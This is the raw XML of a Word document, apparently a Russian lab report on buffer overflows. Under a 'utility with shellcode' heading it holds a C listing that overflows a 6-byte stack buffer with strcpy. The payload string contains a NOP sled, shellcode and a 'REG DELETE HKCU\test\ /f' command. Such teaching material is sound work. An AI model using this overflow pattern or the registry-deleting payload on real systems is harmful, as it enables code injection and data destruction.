    <w:p w14:paraId="0501D16B" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0090221C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CBA72D" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0090221C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>, a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD930C0" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4530B817" w14:textId="633039EC" w:rsidR="006974C5" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DBA032" w14:textId="51465B1A" w:rsidR="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:t>Утилита с шелл-кодом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C7366" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#define _CRT_SECURE_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623FF19" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE4343" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6751BB" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB75E74" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF7B14" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer[6];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411A0AE" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a[] = { "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9D\x73\x77\x77\xEB\x10\x5B\x53\xB9\x60\x46\x2E\x77\xFF\xD1\xBB\x7F\xA2\x71\x76\xFF\xD3\xE8\xEB\xFF\xFF\xFFREG DELETE HKCU\\test\\ /f" };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E1B10" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26710536" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>, a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1BEA2" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054010C">
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B7666C" w14:textId="675B3AC5" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afa"/>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidSect="00D60F7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5991A3" w14:textId="77777777" w:rsidR="00262EE7" w:rsidRPr="00D60F71" w:rsidRDefault="00262EE7" w:rsidP="00D60F71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65364945" w14:textId="77777777" w:rsidR="00262EE7" w:rsidRPr="00D60F71" w:rsidRDefault="00262EE7" w:rsidP="00D60F71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr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CADB5" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC">
    <w:pPr>
      <w:pStyle w:val="af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02A7A0F" w14:textId="4A98CB12" w:rsidR="00C93DCC" w:rsidRPr="00C53ADA" w:rsidRDefault="00C93DCC" w:rsidP="00C53ADA">
        <w:pPr>
          <w:pStyle w:val="aff1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832B3B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FA64C9" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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3D809" w14:textId="77777777" w:rsidR="00262EE7" w:rsidRPr="00D60F71" w:rsidRDefault="00262EE7" w:rsidP="00D60F71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="389F6313" w14:textId="77777777" w:rsidR="00262EE7" w:rsidRPr="00D60F71" w:rsidRDefault="00262EE7" w:rsidP="00D60F71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs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4AA7F0" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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A15F8" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC">
    <w:pPr>
      <w:pStyle w:val="af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4EFE7" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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FA367AB4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32615E52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CEF88C3E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a0"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="737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567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134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1701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5"/>
        </w:tabs>
        <w:ind w:left="2268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2835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39"/>
        </w:tabs>
        <w:ind w:left="3402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06"/>
        </w:tabs>
        <w:ind w:left="3969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73"/>
        </w:tabs>
        <w:ind w:left="4536" w:firstLine="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="33BA1DA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9432A750"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="10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a1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Рисунок %1.%4"/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a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a3"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Листинг 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66976A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AEC0078"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="russianUpper"/>
      <w:pStyle w:val="a4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a5"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Рисунок %1.%4"/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a6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a7"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Листинг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D613D38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7B0684A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66249"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0419001D"/>
    <w:styleLink w:val="a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F156472"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0419001D"/>
    <w:styleLink w:val="a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7FC70B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F4C2824"/>
    <w:lvl w:ilvl="0" w:tplc="70526CC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="aa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0807A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32847FB6"/>
    <w:lvl w:ilvl="0" w:tplc="CADCE40A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a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75A1768"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A6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12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="6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7"/>
  </w:num>
  <w:num w:numId="17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formatting="1" w:enforcement="0"/>
  <w:styleLockTheme/>
  <w:styleLockQFSet/>
  <w:defaultTabStop w:val="709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6EB"/>
    <w:rsid w:val="00015CDA"/>
    <w:rsid w:val="00021818"/>
    <w:rsid w:val="00024172"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="00050662"/>
    <w:rsid w:val="00057EFD"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="00067B65"/>
    <w:rsid w:val="00067B92"/>
    <w:rsid w:val="00083B3B"/>
    <w:rsid w:val="00085756"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000A0F58"/>
    <w:rsid w:val="000A2827"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B3072"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000C5351"/>
    <w:rsid w:val="000D0306"/>
    <w:rsid w:val="000D1502"/>
    <w:rsid w:val="000E2904"/>
    <w:rsid w:val="000E640D"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="001172EC"/>
    <w:rsid w:val="001414E2"/>
    <w:rsid w:val="00141D0C"/>
    <w:rsid w:val="00143C70"/>
    <w:rsid w:val="0014500B"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00155986"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="00186280"/>
    <w:rsid w:val="00197084"/>
    <w:rsid w:val="001A39AF"/>
    <w:rsid w:val="001A538D"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001C7435"/>
    <w:rsid w:val="001D0E55"/>
    <w:rsid w:val="001D6695"/>
    <w:rsid w:val="001D7AE5"/>
    <w:rsid w:val="001E0F41"/>
    <w:rsid w:val="001E210D"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="001E7D66"/>
    <w:rsid w:val="001F1F3F"/>
    <w:rsid w:val="001F2E83"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00216659"/>
    <w:rsid w:val="00226F54"/>
    <w:rsid w:val="00234E61"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00262EE7"/>
    <w:rsid w:val="00273833"/>
    <w:rsid w:val="0028185D"/>
    <w:rsid w:val="002964A3"/>
    <w:rsid w:val="002A0B46"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D36CE"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E0C63"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002F3385"/>
    <w:rsid w:val="00311BB5"/>
    <w:rsid w:val="00311DD6"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="003312A2"/>
    <w:rsid w:val="003367E2"/>
    <w:rsid w:val="00336EFE"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00363C50"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="00372694"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00386A6C"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A19D9"/>
    <w:rsid w:val="003A7922"/>
    <w:rsid w:val="003B1CF3"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C1D89"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C5B25"/>
    <w:rsid w:val="003D196F"/>
    <w:rsid w:val="003D2008"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E32B5"/>
    <w:rsid w:val="003E3A75"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003F0BAA"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00406E67"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00440CA3"/>
    <w:rsid w:val="004468C5"/>
    <w:rsid w:val="00452A08"/>
    <w:rsid w:val="00453CBA"/>
    <w:rsid w:val="004557D2"/>
    <w:rsid w:val="004708EE"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004807F3"/>
    <w:rsid w:val="00480B43"/>
    <w:rsid w:val="00494AE5"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A323C"/>
    <w:rsid w:val="004B022A"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004B666C"/>
    <w:rsid w:val="004C0691"/>
    <w:rsid w:val="004C162F"/>
    <w:rsid w:val="004C2F5C"/>
    <w:rsid w:val="004C3656"/>
    <w:rsid w:val="004C4450"/>
    <w:rsid w:val="004D7079"/>
    <w:rsid w:val="004E75B5"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F58AA"/>
    <w:rsid w:val="004F5C8A"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00513BA2"/>
    <w:rsid w:val="0051427F"/>
    <w:rsid w:val="00515EA6"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="005346BC"/>
    <w:rsid w:val="0054010C"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544D55"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="005557F8"/>
    <w:rsid w:val="00555E44"/>
    <w:rsid w:val="00565474"/>
    <w:rsid w:val="00576D1A"/>
    <w:rsid w:val="005816AE"/>
    <w:rsid w:val="005976CF"/>
    <w:rsid w:val="005A337A"/>
    <w:rsid w:val="005B6078"/>
    <w:rsid w:val="005C3C88"/>
    <w:rsid w:val="005C4169"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005F51CB"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="00602BBB"/>
    <w:rsid w:val="00604BF3"/>
    <w:rsid w:val="00610C6C"/>
    <w:rsid w:val="00613070"/>
    <w:rsid w:val="00614CB9"/>
    <w:rsid w:val="006453D9"/>
    <w:rsid w:val="00662695"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00680322"/>
    <w:rsid w:val="00694F9A"/>
    <w:rsid w:val="006974C5"/>
    <w:rsid w:val="006A2CFB"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B421D"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006B5A9B"/>
    <w:rsid w:val="006B6886"/>
    <w:rsid w:val="006C28B6"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D2863"/>
    <w:rsid w:val="006E22C2"/>
    <w:rsid w:val="006E2B77"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="0071292E"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00732E30"/>
    <w:rsid w:val="007350A2"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00767EE6"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="007A2BD0"/>
    <w:rsid w:val="007A393B"/>
    <w:rsid w:val="007A505E"/>
    <w:rsid w:val="007B6FDB"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D42D3"/>
    <w:rsid w:val="007E7B52"/>
    <w:rsid w:val="008031A4"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00812AEA"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="00832B3B"/>
    <w:rsid w:val="00833573"/>
    <w:rsid w:val="00843C78"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00857773"/>
    <w:rsid w:val="00873FF4"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008C048C"/>
    <w:rsid w:val="008C243B"/>
    <w:rsid w:val="008D310D"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E415A"/>
    <w:rsid w:val="008F0263"/>
    <w:rsid w:val="0090221C"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00920AD5"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="00933684"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00960483"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00964BBD"/>
    <w:rsid w:val="009703A4"/>
    <w:rsid w:val="00970E6E"/>
    <w:rsid w:val="009753DE"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="00987AA9"/>
    <w:rsid w:val="00994705"/>
    <w:rsid w:val="0099505F"/>
    <w:rsid w:val="009A3296"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B27C5"/>
    <w:rsid w:val="009B366C"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C1783"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009D5664"/>
    <w:rsid w:val="009F204D"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A113ED"/>
    <w:rsid w:val="00A12629"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A34197"/>
    <w:rsid w:val="00A63BA8"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A75F50"/>
    <w:rsid w:val="00A80A7A"/>
    <w:rsid w:val="00A966DC"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD107B"/>
    <w:rsid w:val="00AD4DA8"/>
    <w:rsid w:val="00AD702E"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE2BD8"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE5625"/>
    <w:rsid w:val="00B0058C"/>
    <w:rsid w:val="00B0767B"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B3374C"/>
    <w:rsid w:val="00B35DA8"/>
    <w:rsid w:val="00B36CD3"/>
    <w:rsid w:val="00B955F6"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA723C"/>
    <w:rsid w:val="00BD16EC"/>
    <w:rsid w:val="00BD6520"/>
    <w:rsid w:val="00BD7530"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BF0735"/>
    <w:rsid w:val="00BF2C66"/>
    <w:rsid w:val="00C041CE"/>
    <w:rsid w:val="00C108B2"/>
    <w:rsid w:val="00C1287C"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C563C0"/>
    <w:rsid w:val="00C602A6"/>
    <w:rsid w:val="00C649F8"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C718F8"/>
    <w:rsid w:val="00C751D7"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C84622"/>
    <w:rsid w:val="00C8473F"/>
    <w:rsid w:val="00C87364"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00C94F45"/>
    <w:rsid w:val="00CA0315"/>
    <w:rsid w:val="00CB44A9"/>
    <w:rsid w:val="00CB56D5"/>
    <w:rsid w:val="00CC18C8"/>
    <w:rsid w:val="00CD2144"/>
    <w:rsid w:val="00CD5E83"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CF0254"/>
    <w:rsid w:val="00CF3E3C"/>
    <w:rsid w:val="00CF46AC"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D32062"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D379F5"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D66B4F"/>
    <w:rsid w:val="00D72848"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00D81851"/>
    <w:rsid w:val="00D81DEB"/>
    <w:rsid w:val="00D82175"/>
    <w:rsid w:val="00DA087E"/>
    <w:rsid w:val="00DA0D09"/>
    <w:rsid w:val="00DB4602"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DC3B80"/>
    <w:rsid w:val="00DC5F3D"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E33487"/>
    <w:rsid w:val="00E4618D"/>
    <w:rsid w:val="00E57D2D"/>
    <w:rsid w:val="00E6236C"/>
